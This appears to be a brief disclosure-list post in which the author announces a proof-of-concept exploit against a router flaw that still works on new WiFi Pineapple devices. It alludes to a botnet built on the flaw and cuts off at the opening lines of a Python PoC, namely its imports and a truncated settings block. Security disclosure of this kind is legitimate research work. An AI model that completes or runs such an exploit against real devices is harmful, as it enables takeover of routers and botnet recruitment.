Posted by Electric Mind on Aug 08
I have wrote PoC half a year ago, because i needed to try it on my Chinese router, and it still works on freshly
purchased pineapple devices. (hello from Defcon 😉 )
And guys, it’s not a talk for the defcon, especially if you have done a botnet based on that shit… 😉
See ya tomorrow at WiFi village…
POC is below:
#!/usr/bin/env python
from random import choice
from urllib import urlencode
from httplib import HTTPConnection
settings = {…